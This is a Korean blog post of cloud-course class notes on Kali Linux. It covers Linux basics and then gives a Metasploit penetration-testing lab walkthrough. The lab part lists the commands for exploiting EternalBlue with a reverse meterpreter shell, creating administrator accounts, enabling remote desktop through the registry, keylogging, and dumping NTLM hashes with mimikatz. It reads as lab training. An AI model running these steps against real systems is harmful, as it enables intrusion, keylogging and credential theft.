진짜 개발자
본문 바로가기

Cloud 교육

6일차 (칼리리눅스)

728x90

@해시 함수 : 해시함수는 암호화 함수가 아니다

    같은 키값에 대해 항상 같은 출력값을 내는 것이다.


md5 , sha256 - 무결성 보장



@터널창

 root@jjy:~#     사용자 이름 ,  , 위치 , 권한

# : 관리자 , $ : 사용자


한/영 전환 : ctrl + shift + space


복사 : alt + insert

붙혀넣기 : shift + insert




@리눅스 계열


1. Debian - Debian , Ubuntu

(kali는 debian 계열)

인터넷 소프트웨어 설치 명령어 : apt (설정파일 위치 다름)



2. Slackware - Slacware , Suse Linux

인터넷 소프트웨어 설치 명령어 : ziper


3. Redhat - Redhat , Centos , Fedora

인터넷 소프트웨어 설치 명령어 : yum


@리눅스 버전 - Kernel.org

 XX     .     XX     .     XX

    메이저       마이너     릴리즈



클라우드 아키텍쳐 기반 - x86 (CPU : intel계열)

 =>  마이크로세서가 달라지면 명령어 체계가 달라지므로 다른 계열을 지원하지 않는다



@kali 한글


 1. apt-get  install  -y  nunum nabi im-switch

 2. im-config -s nabi

 3. im-config -c

hagule 에서 space 후 enter



@@apt 안먹을 때 :  vi /etc/apt/sources.list     

   deb http://http.kali.org/kali kali-rolling main non-free contrib



*tar명령어 : tar는 여러 파일을 하나로 합치는 명령어이다

옵션 =

 -c : 새로운 파일 생성하며 합침

  -x : 다시 여러개로 푸는 명령



*시스템 종료 명령어 : 

init 6 - 재부팅



@터미널 영어 깨질때 : LANG=C


@리눅스 VI 


*입력 :   a : 글자 바로 앞에

A : 문장 맨앞으로

i : 글자 바로 뒤에

I : 문장 맨뒤에

o : 밑줄

O : 윗줄


*저장 :  (:)콜록 입력후 wq 

또는 ZZ



@Vmware 주변 프로그램 설치 => 클립보드 동기화(copy) , 화면 크기 맞춰짐


1.  Vmware Tap -> VM -> install VmWareTools

2.  cd /media/cdrom/

3.  mkdir /vm    <= 마운트포인트 디렉토리 생성

4.  cp VMwareTools-10.1.15-6627299.tar.gz /vm    <= 설치할 프로그램 복사

5.  tar xvfz VmwareTools-10.1.15-6627299.tar.gz    <= 압축 풀기

6.  ./vmware-insall.pl    <= 설치프로그램 실행

7.  reboot

8.  enter 연타


@터미널 단축키

1. 전원버튼

2. 환경설정

3. 장치

4. 키보드

5. 제일 하단 +(추가)

6. 이름 : Terminal

    명령어 : gnome-terminal

    단축키 : 맘대로


@Db 실행 => service postgresql start

       msfdb init (kali 설치후 딱한번만 하면됨)


#용어 

Exploit : 취약점

payload : 

CVE : 취약점 표준 코드

이터널 블루 : 보안 취약점 공격 도구


@모의 해킹


*순서

1. 정보수집

2. 취약점 분석

3. 웹엡 분석

4. 데이터베이스 평가

5. 비밀번호 공격

6. 무선 공격

7. 역공학

8. ...


*Metasploit(메타스플로잇)

- 공격도구 , 페이로더 , 인코더 , 정찰도구 , 보안 테스팅을 제공하는 취약점 진단 및 공격 툴



*실습

0.   service postgresql start : Postgres DB에 메타스플로잇을 연결하면 사용한 공격 모듈 정보가 남아 있어 다음에 또 사용시 빠르다

msfdb init  : 디비 초기화

msfconsole  : 메타스플로잇 실행


1. search eternalblue : 취약점 찾기  

*서치속도 느릴때 : db rebuild cache

2. use exploit/windows/smb/ms17_010_eternalblue

3. show options : 옵션들 보기

RHOST : 타겟 IP


4. set RHOST 1.0.0.1   :  공격 타겟    

   set payload windows/x64/meterpreter/reverse_tcp   : 공격 행위 결정    (set payload tap 두번 하면 사용가능한 payload가 보임)

   set LHOST 1.0.0.12   :  시도하는 자

   run : 공격 시도 => 상대 컴퓨터에 접속됨

   (windows 7 은 135,139,445 포트를 열어야 한다)

   ps : 상대 컴퓨


  => 상대 컴퓨터에 접속 완료 (  meterpreter >   가 뜨면 완료됨)


  ? : 사용가능한 명령어 보임

   1. screenshot : 상대 컴퓨터의 화면이 캡쳐됨 ( 위치 -> 홈 )


   2. shell : 상대 컴퓨터의 shell이 실행됨 

=>

   *User다루기

    net user administrator /Active:yes  :  해킹한 PC의 administrator 계정 활성화

     net user 사용자  비밀번호 : 해킹한 PC의 administrator 비밀번호 지정

net user  이름  /add : 사용자 계정 생성


   *Group다루기

     net localgroup 그룹이름 /add : 그룹추가

     net localgroup 그룹이름 사용자이름 /add  : 그룹에 사용자 추가


(*migrate explorer 를 한후에는 사용자 계정의 권한을 얻어오는 것이므로 migrate를 하지 않고 

  해야함)

(* shell 명령어 깨질때 : chcp 65001)


  3.  원격데스크톱 

1.   shell에서 administrator 권한 얻고나서 

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f   :  원격데스크톱 허용

2.   rdesktop -u user -p password  ip  : 원격 데스크톱 요청

*실습2 (key loggin)

explorer - 사용자 작업 환경

   => 사용자가 사용하는 모든 프로그램은 explorer 자식 프로세스로 생성된다

*키로깅을 위해서는 explorer 권한을 가져와야 한다


1. ps 를 통해 실행중인 프로세스를 확인 하여 exploerer의 pid를 찾는다


2. migrate explorerPID 


3. keyscan start


4. keyscan_dump

 (migrate가 안되는경우 window7 재부팅)


*mimikatz 

load mimikatz

mimikatz_command -f hash::ntlm


crackstation.net 에서 lm 비밀번호 값을 

'Cloud 교육' 카테고리의 다른 글

Vmware Nat service 오류시  (0) 2018.09.11
Server 개념  (0) 2018.09.11
5일차 (시스코 패킷트레이서 멀티유저 설정)  (0) 2018.09.07
라우터 구조  (0) 2018.09.07
시스코 패킷 트레이서 라우팅  (0) 2018.09.07